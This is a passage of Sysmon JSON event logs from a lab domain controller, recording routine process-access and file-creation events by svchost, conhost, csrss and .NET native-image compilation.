C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-0010129B0B00}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-0010129B0B00}","TargetProcessId":"4388","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:01.949\r\nProcessGuid: {E2A3D6B1-132D-5F25-0000-001026980B00}\r\nProcessId: 4400\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1130-0\\Microsoft.Build.Framework.dll\r\nCreationUtcTime: 2020-08-01 07:01:01.949","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:01.949","ProcessGuid":"{E2A3D6B1-132D-5F25-0000-001026980B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1130-0\\Microsoft.Build.Framework.dll","CreationUtcTime":"2020-08-01 07:01:01.949","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.996\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010389D0B00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.996","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010389D0B00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.996\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010389D0B00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.996","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010389D0B00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
